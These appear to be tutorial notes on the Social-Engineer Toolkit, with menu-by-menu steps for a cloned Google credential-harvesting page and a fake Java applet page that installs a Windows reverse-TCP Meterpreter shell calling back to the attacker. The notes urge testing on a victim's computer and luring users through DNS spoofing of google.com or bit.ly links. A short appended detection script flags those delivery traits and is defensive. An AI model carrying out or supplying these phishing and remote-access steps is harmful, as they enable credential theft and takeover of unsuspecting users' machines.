Social-Engineer Toolkit (SET)

The Social Engineer Toolkit (SET) is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly.

Start SET

Kali Linux menu -> 08 – Exploitation Tools -> social engineering toolkit (SET)

/usr/share/set/setoolkit
sudo setoolkit

Credential Harvest

Create a fake web page to obtain credentials. Undetectable, works on any platform.

# Get Kali Linux IP address for fake website
ifconfig

# Run SET
/usr/share/set/setoolkit
or
Kali Linux menu -> 08 – Exploitation Tools -> social engineering toolkit (SET)

Enter 1 for social engineering attacks
Enter 2 for website attack vector
Enter 3 for credential harvester
Enter 1 for web templates (common websites like "Java Required", Google, Facebook, Twitter, Yahoo)
NAT/port forwarding prompt: NAT is used when doing the attack remotely; on the same network answer "no"
Enter IP: x.x.x.x
Enter 2 for Google

# All captured form fields are displayed in SET
# Reports are saved in /root/.set/reports/

# Test
Open a browser and go to the Kali Linux IP: http://x.x.x.x

# Convince the user to open the Kali Linux IP in a browser:
Option 1: If the user is on the same network, do DNS spoofing on google.com
Option 2: Go to bit.ly to create a shortened URL, as often used on social media sites like Twitter and Facebook

Malicious Site

Create a fake web page with malicious code embedded that will infect the computer and give full access to it.

# Get Kali Linux IP address for fake website
ifconfig

# Run SET
/usr/share/set/setoolkit
or
Kali Linux menu -> 08 – Exploitation Tools -> social engineering toolkit (SET)

Enter 1 for social engineering attacks
Enter 2 for website attack vector
Enter 1 for Java Applet attack # will create a website with a Java applet in it
Enter 1 for web templates (common websites like "Java Required", Google, Facebook, Twitter, Yahoo)
NAT/port forwarding prompt: NAT is used when doing the attack remotely; on the same network answer "no"
Enter IP: x.x.x.x
Enter 2 to use the applet built into SET (option 1 requires paying for a certificate)
Enter 1 for Java Required template
Enter 2 for Meterpreter multi-memory injection
Enter 1 for Windows Reverse TCP Meterpreter (will connect back to my computer)
Enter port: leave default 443
Enter 6 to finish adding payloads

# Test on a victim computer, NOT on my own!
Open a browser and go to the Kali Linux IP: http://x.x.x.x

# Convince the user to open the Kali Linux IP in a browser:
Option 1: If the user is on the same network, do DNS spoofing on google.com
Option 2: Go to bit.ly to create a shortened URL, as often used on social media sites like Twitter and Facebook

# When a Meterpreter connection comes in, list the open sessions
sessions
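
Detection side of the two delivery options listed in both sections above (a page served from a bare IP over http, a spoofed DNS answer for google.com, a bit.ly link). This is an added example, not part of the original notes or of SET; the function names, the shortener and brand lists, and the sample values are constructed assumptions for a proxy/DNS log triage script.

```python
import ipaddress
from urllib.parse import urlsplit

# Assumption: link shorteners that hide the real destination; extend locally.
SHORTENERS = {"bit.ly"}
# Assumption: public names that should never resolve to an internal address.
PUBLIC_BRANDS = {"google.com", "facebook.com", "twitter.com", "yahoo.com"}

def host_ip(host):
    """Return an ip_address object if host is an IP literal, else None."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        return None

def check_url(url):
    """Flag URL traits that match the delivery methods in the notes."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    findings = []
    if host_ip(host) is not None:
        findings.append("bare-ip-host")        # login page with no domain name
        if parts.scheme == "http":
            findings.append("plaintext-http")  # credentials would travel in clear
    if host in SHORTENERS:
        findings.append("url-shortener")       # expand before trusting the link
    return findings

def check_dns(qname, answer):
    """Flag a public brand name answered with a private (RFC 1918) address,
    the visible symptom of same-network DNS spoofing."""
    name = qname.lower().rstrip(".")
    is_brand = any(name == b or name.endswith("." + b) for b in PUBLIC_BRANDS)
    ip = host_ip(answer)
    if is_brand and ip is not None and ip.is_private:
        return ["public-name-private-answer"]
    return []

if __name__ == "__main__":
    # Constructed sample log entries, not real traffic.
    for url in ("http://192.168.1.50/", "https://bit.ly/EXAMPLE",
                "https://accounts.google.com/"):
        print(url, check_url(url))
    for qname, answer in (("google.com.", "192.168.1.50"),
                          ("www.google.com", "8.8.8.8")):
        print(qname, answer, check_dns(qname, answer))
```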